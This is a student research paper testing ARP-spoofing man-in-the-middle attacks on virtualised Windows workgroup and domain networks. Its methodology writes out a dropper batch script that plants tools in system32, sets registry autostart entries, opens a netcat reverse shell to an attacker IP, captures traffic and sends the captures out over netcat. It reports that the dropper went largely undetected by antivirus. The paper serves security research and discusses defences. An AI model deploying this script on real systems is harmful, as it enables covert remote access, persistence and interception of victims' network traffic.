INVESTIGATING THE FEASIBILITY OF MITM ATTACKS IN A CORPORATE ENVIRONMENT

Nobel Ang1, Koh Chuen Hoa2 1River Valley High School, 6 Boon Lay Ave, Singapore 649961 2DSO National; Laboratories, 20 Science Park Drive, Singapore 118230

INTRODUCTION

An MITM (Man in the Middle) attack allows for the control over network data sent between 2 other machines on the same network by convincing the 2 machines that the Attacker machine is the other victim machine. MITM tools commonly uses ARP spoofing to achieve that. ARP (Address Resolution Protocol) is a network protocol used to match software addresses (IP address) to hardware addresses (MAC address). ARP is an insecure protocol as it does not require verification, thus ARP spoofing is easily conducted as the MITM tool simply has to broadcast more packets than the intended victim machines. The implementation of a MITM provides hackers significant information about the end victims, such as passively eavesdropping, capturing, intercepting and modifying network packets in-transit while being completely invisible to both victims.

Therefore, MITM should be common in past hacking incidents [1] and MITM tools for Windows on the internet should be common and updated. However, this is not the case as most tools are developed for Linux. Thus, there appears to be significant obstacles in deployment of MITM tools in modern Windows machines and networks. This project aims to find out if this is true.

The feasibility of an ARP based MITM attack will be tested via a virtualised Windows network with constraints similar to an actual remote attacker. When deploying tools for the attack, observation on the obstacles an attacker will face will be made.

BACKGROUND

ARP (Address Resolution Protocol) is a request and reply protocol used within a network to resolve the network layer address (IP addresses) to a link layer address (MAC address). A table known as the ARP cache is used to correlate the known IP address to the corresponding MAC address. When a machine tries to connect to an IP which is not recorded in the ARP cache, a request packet is broadcasted through the network with the format “Who has [Target IP]? Tell [Initial Host Machine IP]”. When any machine on the network has the corresponding MAC address requested, it will respond by “[Target IP] is at [Target MAC address]”. This protocol is required as client machines often have dynamic IP addresses and the protocol can correlate the network address with the physical address.

Figure 1: ARP request and response packets

After an interaction is completed, both machines will save the information in the ARP cache which can be change with another ARP interaction.

1

ARP spoofing works by an attacking machine broadcasting reply packets constantly but by using the attackers MAC address instead of the victims MAC. For example, on this system, 192.168.1.99 was performing the attack and it will broadcast that 192.168.1.53 is at 00-26- 55-3f-7a-e1.

Fig 2: ARP table in a network

After the ARP table has been changed, network information that was intended for 192.168.1.53 will instead be sent to 192.168.1.99. The attacker can choose to either passively capture packets, modify network packets that are in transit, or deny the victims a connection. This is conventionally known as a Man in the Middle Attack (MITM).

Workgroups are a peer-to-peer local area network used for easily sharing files and providing simple user control. It is more common in a small business or home system. Workgroups only provide generalised permissions similar to permissions given to a local user account. Most users in a Workgroup setting log on to the machine as a Local Administrator, and has full control over the machine.

A domain setup is usually implemented in a corporate environment. A domain setup involves a domain controller and the client machines. Client systems have restricted privileges which can be granularly controlled by the domain controller. The domain server will provide very fine-grained control of the user machines and it has been common corporate practice to restrict user’s privilege unless required for other reasons. By default user are denied access to possibly vulnerable permissions such as changing services and having domain administrator privileges. This is because sensitive information is contained in these networks.

METHODOLOGY

The attack model we have employed allows the attacker to access initial local administrator target machine and persist even if the user logs on to a Domain user account. This is because the vector require privileges which is likely unavailable to users in a Domain, thus a temporary privilege escalation is required.

The different setup experimented with will be 1) a victim local administrator machine, 2) a victim Domain user and 3) a victim initially logged in as a local admin re-logs on as a domain user.

The domain setup (server, victim 1 and 2) and the attacker are in separate NAT networks. An NAT network works by connecting all internal machines in an internal network and sending external connection through the host machine. Thus port routing have been set up to allow for connections between the attacker and victims.

2

Fig 3: Network Setup of virtual machines

Tools 1) Netcat (Version 1.1) [2] Netcat is a networking tool mainly used to make connections. In this project, netcat will be used as a backdoor and provide a remote reverse shell connecting from the victim to the attacker. The shell allows attackers to run commands subjected to the privilege of the user logged-on. Netcat will be used to transfer the capture network files to the attacker machine.

2) Winarp-mim (Version 0.95) [3] Winarp-mim is a Windows port of an older version of ARP-sk. It has been modified specially for MITM attack. Further modifications were made to allow for autonomous operation. It needs the RAS service to operate invisibly.

3) Tshark [4] Tshark is a part of the Wireshark program which is a network packet capturing and analysis tool. Tshark is a controlled via a command prompt. It will be used for packet capturing.

4) WinPcap [5] WinPcap is a packet capturing driver which is needed by Wireshark. The key service for WinPcap is known as the NPF service.

5) Remote Access Remote Access (RAS) that it is a Windows service that routes packets. In this MITM attack, the service is used to route packets between the two victims in the MITM attack transparently, so that the two victims communicate as per normal.

Initial Attack Vector The initial attack vector, which is a malicious file downloaded and ran by victim 1 is a folder consisting of an .exe file which will run a script and a hidden tools folder. The tools folder will contain netcat, tshark, Winarp and Wireshark.pcap.

Fig 4: Initial attack vector folder

A scan on all vector files was conducted through virustotal.com. The only file that was detected as a malicious program is winarp which only shows up in 2 of the 54 anti-virus database. After running the script, all programs should be started at launch and a remote shell will be sent to the attacker’s machine.

3

Fig 4: Virustotal scan results

Initial Script

Fig 5: Attack vector script

1) @echo off - to run the script without a visible prompt 2) move "*userprofile*\Downloads\Vector\Tools\*.*" "%systemroot%\system32" - move tools to system32 folder 3) reg add - change registry to allow auto startup of winarp, netcat and tshark 4) nc.exe -d 192.168.56.1 100 -e cmd.exe -d – operate invisibly 192.168.56.1 -p 100 – connect to attacker ip on port 100 -e cmd.exe – send a remote shell to attacker 5) tshark.exe -i 1 -b filesize:2000 –w %systemroot%\system32\Wireshark.pcap -i 1 – capture on adapter 1 -b filesize:2000 – write to a new file once file size exceed 2000kB –w %systemroot%\system32\Wireshark.pcap – capture to Wireshark.pcap 6) winarp.exe –a 10.0.2.4 –b 10.0.2.6 -a 10.0.2.4 –b 10.0.2.6 – IP of 2 victim 7) sc config “Remote Access/ NPF” start= auto - Auto start services RAS and NPF At the same time, the attacker machine will run netcat -vv –L –p 100 –vv – extra verbose –L – listening –p – on port 100 The transfer of captured packets will be done through the remote shell nc –vv –w 2 10.0.2.15 –p 101 < [filename] – Remote Shell nc –vv –w 30 –p 101 > [filename] – Attacker machine

EXPERIMENTS

Local Admin The first victim will be a local admin. This is similar to a user in a workgroup setup

Results

4

Overall, the attack was a success. The registry change was successfully made and netcat, winarp and tshark ran successfully at start up.

Fig 5: Process successfully ran at start up Fig 6: Registry changes made

A remote reverse shell was also spawned on the attacker machine.

Fig 7: Remote shell spawned

The ARP cache on the server and victim 2 was checked and verified that the ARP poisoning was working. Victim 1 has the MAC address 08-00-27-bd-10-84. From the figure, it can be seen that Victim 2 now sees Victim 1 as the server (IP address 10.0.2.4), while the server sees Victim 1 as Victim 2 (IP address 10.0.2.6). The MITM attack is hence successful.

Fig 8: Correct ARP cache

Fig 9: ARP cache on victim 2 after spoofing Fig 10: ARP cache on server after spoofing

Network Packets The captured packets contained all communication among the server, victim 1 and victim 2. An example of useful captured information are DNS requests between the server and the victim machines.

Fig 11: Captured DNS packets

Conclusion on Local Administrator campaign The campaign on the local administrator setup has been a success as the attack has been conducted almost invisible to the user, with only one User Access Control (UAC) prompt presented to the user for permission to run.

5

Domain Setup By default, all permission in the Windows group policy have been set to No. The key permissions set are listed below.

Fig 12: Default permission for a Domain user

Thus, change to Routing and Remote access and services is denied on a domain user but running the initial vector file which run via the command prompt is possible.

Results The campaign was a partial success. Initially, the movement of files, registry edit and services change have not been registered. This is due to the lack of administrative access and permission to change RAS from the domain user. If the initial file is attempted to run as an administrator, a prompt requesting a login for a domain administrator account appears.

Fig 13: Denied access to RAS Fig 14: Request for Domain admin login (UAC prompt)

Moving netcat and the autostart command set in a .bat file to the start-up folder in the start menu allowed for the netcat remote shell to work but access to some folders were restricted.

Fig 15: Restricted folders for the remote shell

Winarp and Tshark also could not work as the services were not able to be started.

Conclusions on Domain Setup The implementation of an ideal attack on a domain user only partially succeeded. The netcat remote shell could be set up but Winarp and Tshark could not as they requires administrative privileges to access the RAS and NPF drivers.

Further privilege escalation is required for a fully successful attack.

Local Admin →Domain Setup The vector will firstly be applied on a local administrator, then the same machine will be logged in to a domain user’s account. Changes made by the vector file will be checked to see if the changes made when logged on as a local administrator persist when logged on as a

6

domain user. These changes include the change to the registry, the movement of files to system32 and the start-up of the RAS and NPF services.

Results The attack was a success. All changes were not rolled back by the domain.

Fig 16: Files remained in sys32 Fig 17: Processes ran at start up

Fig 18: Services set for autostart

The remote shell was successfully spawned on the attacker machine but it had restricted access similar to the one in the domain setup.

Conclusion on Local Admin → Domain Setup The attack on this setup was a success. Administrator privilege is only required for the user that open the vector file. Only temporary administrative access is needed for a successful attack and will leave the entire system vulnerable.

RESULTS AND DISCUSSION

The level of success on each setup is summarized in the table below. Setup Remote Registry Movement of files to Starting of MITM Shell Change sys32 and autostart of service attack programs Local Full Successful Successful Successful Success Admin access ful Domain Restricted Failed Successful (moved to Failed Failed User Access start menu instead) Local Restricted Successful Successful Successful Success Admin → Access ful Domain Setup Table 1: Summary of levels of success in each setup

The main limitation of the domain setup is the lack of administrative access for the initial user which opens the vector file. This restricts programs such as Winarp and Tshark from gaining access to the adapter list and the winPcap driver NPF, thus MITM tools could not work. However, as a remote shell was successfully deployed, more tools can be implemented for privilege escalation. This confirms our initial hypothesis that there are significant obstacles in implementing MITM tools in a Morden Windows corporate system.

Another limitation which restricted the implementation of a successful attack in an easier way was the implementations of UAC (user account control) since Windows Vista. This security

7

option severely restricts administrative access given out to programs and users. A request of Administrative access will have to be accepted by the user via a UAC prompt. This prevents net cat from sending a remote shell with administrative access which prevents the control of Winarp and Tshark directly. Furthermore, the administrative access needed for a successful attack is due to UAC preventing changes to the computer without an administrator’s permission. This security feature had significantly reduced the vulnerability of machines without administrative access.

The implementation of an MITM attack is possible on an infected domain user with tools for privilege escalation. However, with that level of privilege, hackers can implement attacks which can provide them with much more valuable data such as key loggers. These tools can allow hackers to gather more data in a domain setup, thus MITM attacks are much less favoured as an attack for APT.

The prevalence of tools targeting Linux instead of Windows systems can be attributed to the ease of crafting such tools for Linux machines.

Lastly, MITM attacks on Windows system can be easily adverted by implementing an off- the-shelf anti-arp spoofing tool which can reset the ARP cache from a fixed database and can further notify a system user of a MITM attack. The program will request for a predefined ARP cache and change the ARP cache of user machines back if they are found to be tampered with. A user will also be warned of the attack. These tools are mainly built for Windows systems and make a MITM attack even harder. One such example is ARPON [4].

FURTHER INVESTIGATIONS

Windows extension In our investigation, a successful attack on a domain user could not be implemented. However, as a netcat reverse shell could be achieved. Thus an investigation to finding out what an attacker needs to conduct such an attack, and to then enforce defences against it.

Routing services A large obstacle in the prevention of the attack on a Domain user is the inability to start the required services. Thus a Windows extension investigating privilege levels required for software to route packets without the use of RAS.

Prevention Tools An investigation can be done to find out the feasibility and ease of implementing anti-ARP spoofing tools and the capabilities of those tools in preventing and detecting ARP spoofing attacks.

CONCLUSION

In this project, we have demonstrated that it is feasible to conduct an MITM attack on a local admin system. This shows that home or work group systems are vulnerable towards such attack.

However, in terms of a domain setup, there are several significant obstacles preventing a successful MITM attack. A relatively high level of privilege (domain administrative access) is required. This makes attacks on corporate environments extremely hard as Administrative

8

access are carefully controlled in corporate environments. A remote shell is given to the attacker, which allows the attacker to inject more tools. This allows for the possibility of privilege escalation which can result in a successful attack. This requires much more advanced tools, which may not be available to all attackers and the attackers who have access to such tools can implement other attacks which can work more efficiently. These restrictions are mainly a result of Windows revisions implementing security feature which reduce the vulnerability of such systems.

Lastly, we have found that even a temporary access to admin privileges can leave the entire network vulnerable.

9

REFERENCE

[1] APT 28 and 30 https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf https://www.fireeye.com/content/dam/legacy/resources/pdfs/apt28.pdf

[2] Netcat http://nc110.sourceforge.net/

[3] Winarp-mim http://sid.rstack.org/arp-sk/

[4] winPcap http://www.winpcap.org/

[5] ARP ON http://arpon.sourceforge.net/

Wikipedia list of ARP spoofing tools https://en.wikipedia.org/wiki/ARP_spoofing

A New Scheme to Check ARP Spoofing: Prevention of MAN-IN-THE-MIDDLE Attack http://www.ijcsit.com/docs/Volume%202/vol2issue4/ijcsit2011020420.pdf

10